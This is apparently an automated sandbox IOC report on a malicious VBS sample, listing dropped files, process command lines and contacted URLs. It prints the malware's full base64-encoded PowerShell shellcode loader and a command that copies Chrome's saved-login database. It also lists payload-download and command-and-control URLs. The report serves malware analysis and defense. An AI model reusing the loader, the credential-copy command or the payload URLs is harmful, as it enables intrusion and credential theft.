IOC Report

loading gif

Files

File Path
Type
Category
Malicious
MTIR22024323_0553381487_20220112120005.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\DB1
SQLite 3.x database, last written using SQLite version 3032001
dropped
malicious
C:\Users\user\AppData\Roaming\O118090C\O11logri.ini
data
dropped
malicious
C:\Users\user\AppData\Roaming\O118090C\O11logrv.ini
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
data
modified
clean
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
clean
C:\Users\user\AppData\Local\Temp\FORSVARL.dat
data
dropped
clean
C:\Users\user\AppData\Local\Temp\RES5835.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ti3icgl.ztk.psm1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v10kgrqs.2gg.ps1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP
MSVC .res
dropped
clean
C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.0.cs
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
clean
C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
clean
C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
clean
C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.out
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
modified
clean
C:\Users\user\AppData\Roaming\O118090C\O11logim.jpeg
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
dropped
clean
C:\Users\user\AppData\Roaming\O118090C\O11logrg.ini
data
dropped
clean
C:\Users\user\Documents\20220113\PowerShell_transcript.675052.bBuy1HxC.20220113145401.txt
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
dropped
clean
There are 8 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdACQAYgBpAGQAcgBhAGcAcwAzACwAMAAsAFsAcgBlAGYAXQAkAGIAaQBkAHIAYQBnAHMAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAFMAbwBjAGkAYQBsAGQAZQBtADcAIABTAEMAQQBMAEQAIABCAG8AZwBnAGwAZQBzACAAcwBpAGsAaAAgAE8AbABpAHMAawBlACAAUwBqAHUAcwBrAGUAbQBhAGwANgAgAGkAbgB2AGUAcwB0AG0AIABFAGwAaQB0ADkAIABNAFUATABUAEkARgBBAEMAVABPACAARgByAHUAZwBhAGwAIABCAHIAbgBlAHAAcwB5ACAARQB4AHAAcgBlAHMAcwAgAEYAcgBkAGUAIABDAE8AUgBSAE8ARABFAFIAIABGAFIATwBOAFQAIABmAGkAdAB0AGkAbAB5AHMAawBlACAARQBwAGkAcABsACAAUAB1AHIAdgBlAHkAIABtAHUAbgBkAHMAawAgAFMAdAB1AGQAZQA0ACAAcwBlAGwAcwBrAGEAIABrAG8AbQBwACAAawBiAGUAcwB1AG0AcwBhAG4AIABBAHUAdABvAHQAbwBtAGkAYwBmACAAVABSAEEASQAgAGwAYQBuAGMAZQB3ACAAVAByAGEAbgBzACAAQgBpAG8AcgB5AHQAbQBlACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAGEAbgBlAGIAZQByAHIAaQBlADIAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwARgBPAFIAUwBWAEEAUgBMAC4AZABhAHQAIgANAAoAIwBCAFIAQQBUAFMAQwBIAEUAUgAgAFAAcgBzAHQAIABGAG8AcgBtAHUAbABlAHIAZQAzACAATgBhAHMAbwBwAGgAYQByAHkAbgAgAE0AbwBuAHQAZwAgAEMATwBOAFQAUgBBAEwAVAAgAE4ATwBOAEMAQQBQAEkATAAgAFYAaQBjAHQAbwByAGkAYQBuADMAIABCAFIATgBEAEUAVgBJAE4AUwAgAE0AeQB6AG8AZAAgAEIAdQBzAGgAZwBhAHMAdABlAHIAIABmAGkAcwBzAHUAcgBlACAAVwBoAGUAcgBlAGUAOQAgAGYAaQBlAGwAZABtAGEAbgAgAEMAbwBsAGEAdQB4AGUAdAAyACAARQBsAHUAYwAyACAAZQBsAG8AaQBnAG4AaQBuAGcAZQAgAFMAdgByAHQAZQBuAGQAZQAgAGgAZQBtAG0AZQBsACAAVABBAEwARQBPACAAUgBrAGUAYgBpACAAUwBUAEoAWQBMAEwAQQBOAEQAUwAgAEsAcgB5AHMAdABhAGwAIABsAGkAZwBlAHMAawBlACAAUwBhAG0AbQBlAG4ANgAgAFQAcgBpAGcAZwA0ACAAcABzAHkAawBvAHQAZQBrACAAQwBPAE0ARQBEAE8AIABlAHUAbABvAGcAaQBjAGEAbAAgAE0AYQByAGsAIAANAAoAJABiAGkAZAByAGEAZwBzADQAPQBbAGIAaQBkAHIAYQBnAHMAMQBdADoAOgBDAHIAZQBhAHQAZQBGAGkAbABlAEEAKAAkAGIAaQBkAHIAYQBnAHMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBDAG8AYwBvAG8AbgBlAGQANgAgAFYAaQBhAHQAaQBjAGEAZABlACAAaQB0AGUAcgBhAHQAaQB2AGIAIABhAHYAaQBzACAASwByAGUAbAByAGUAcgBlAGYAIABvAGIAagBlAGsAdABrAG8AZAAgAHQAYQBsAGkAdABlACAAawBpAGoAZQAgAE0AYQBjAHIANgAgAEcAdQBpAGwAbABvAHQAIABQAFIARQBEAE8AUABTACAAUwB1AGMAYwB1AG0AYgBpAG4ANQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAbwB2AGUAcgBjAG8AbgAiACAADQAKACQAYgBpAGQAcgBhAGcAcwA1AD0AMAA7AA0ACgAjAFcAZQBkAGcAZQB0AGEAaQBsACAAUgBhAHQAaQA2ACAATgBvAHQAYQB0AGUAcwBkAHIAaQAgAE4ATwBOAEgASQBFAFIAIABGAGkAbABlAHQAIABzAHQAaQBmAGYAIABSAGUAYwBhADgAIABGAGwAdQBiAGsAbwBlACAARQBsAGUAYwB0AHIANQAgAEkAbgBkAGUAcwB0AGEAYQBlAG4AIABSAG8AYgBoAGEAaABiAGkAZAByADEAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGoAbwByAGQAYgByAHUAZwBlAHQAIgAgAA0ACgBbAGIAaQBkAHIAYQBnAHMAMQBdADoAOgBSAGUAYQBkAEYAaQBsAGUAKAAkAGIAaQBkAHIAYQBnAHMANAAsACQAYgBpAGQAcgBhAGcAcwAzACwAMgA2ADcAMQAxACwAWwByAGUAZgBdACQAYgBpAGQAcgBhAGcAcwA1ACwAMAApAA0ACgAjAGMAYQByAGIAbwAgAGoAYQBwAG8AIABtAGkAcwBmACAATQBhAGYAZQA5ACAAawBvAG0AbQB1AG4AZQBzAGYAaQAgAFcAYQByAHIAZQBkAGQAZQBsADEAIABhAGMAZQB0ACAAQwBvAGEAcwB0ADIAIABzAHQAYQB0AHUAIABJAG0AcABlAGQAMgAgAEwAaQB0AHQAZQByADMAIABzAGMAaQByAHIAaABvAHUAcwBzACAAVwBhAGkAawBsAHkAYwBvAHUAMwAgAG4AZQBwAGUAbgB0AGgAIAB0AG8AcgBtACAATABnAGUAcwB0AHUAZABlAHIAIABEAGUAcABvAG4AZQByADYAIABBAEsAVABJAFYAUwBUAE8ARgAgAFMAbABlAGUAIABVAG4AaQBuAHQAcgAgAFIAYQBkAGkAbwBhAHMAdAAgAEEAZgB2AGEAbgBkAHIAZQAyACAAcwBhAGQAZQBsAHQAYQBzACAATABPAFYATwAgAEIAZQBkAHUAIABnAGwAbwBzAHQAcgB1AHAAIABNAEEAQwBVAFMASABMAEEAUQAgAFUAbgB0AHIAbwB0ADcAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAZQBzAGcAZQBuADkAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUgBlAHQAZQBsAGwAaQBuACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAeQBzAHQAZQBtAGYAdQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEEAVABFAFIAUABJAFQASgBPACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATgBHAFMATABFAFIAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAYgBhAGwAbABhACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUAbgBkAGUAcgAyACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHMAcAByAHUAaQBrAGUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAQwBhAHAAdABpAHYAZQBzAGcAMgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBtAGEAdABoAGkAYQBzAGUAbgBzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMASQBHAEkATABMACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAE8AUABIAEkATwBMAEEAVABFAFIAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAdAByAG4AaQBuAGcAcwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBFAHYAYQBjAHUAYQB0ACIAIAANAAoAWwBiAGkAZAByAGEAZwBzADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAGIAaQBkAHIAYQBnAHMAMwAsACAAMAAsADAALAAwACwAMAApAA0ACgANAAoA
malicious
C:\Program Files (x86)\Internet Explorer\ieinstal.exe
C:\Program Files (x86)\internet explorer\ieinstal.exe
malicious
C:\Program Files (x86)\Internet Explorer\ieinstal.exe
C:\Program Files (x86)\internet explorer\ieinstal.exe
malicious
C:\Program Files (x86)\Internet Explorer\ieinstal.exe
C:\Program Files (x86)\internet explorer\ieinstal.exe
malicious
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
malicious
C:\Windows\SysWOW64\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe
malicious
C:\Windows\SysWOW64\cmd.exe
/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
malicious
C:\Program Files (x86)\Internet Explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
malicious
C:\Program Files (x86)\Internet Explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
malicious
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
malicious
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
clean
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
clean
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
clean
C:\Windows\SysWOW64\autochk.exe
C:\Windows\SysWOW64\autochk.exe
clean
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
clean
There are 7 hidden processes, click here to show them.

URLs

Name
IP
Malicious
www.jewelrystore1.com/wk3t/
malicious
https://www.wizumiya.co.jp/html/user_da
malicious
http://www.autoitscript.com/autoit3/J
unknown
clean
http://nuget.org/NuGet.exe
unknown
clean
http://pesterbdd.com/images/Pester.png
unknown
clean
https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at
unknown
clean
http://crl.microsoft
unknown
clean
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
clean
https://contoso.com/
unknown
clean
https://nuget.org/nuget.exe
unknown
clean
https://contoso.com/License
unknown
clean
https://contoso.com/Icon
unknown
clean
http://schemas.microsoft.
unknown
clean
http://fahrschule-heli.at/bin_WUOAiR166.bin
unknown
clean
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
unknown
clean
https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.bin
52.68.15.223
clean
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
clean
https://github.com/Pester/Pester
unknown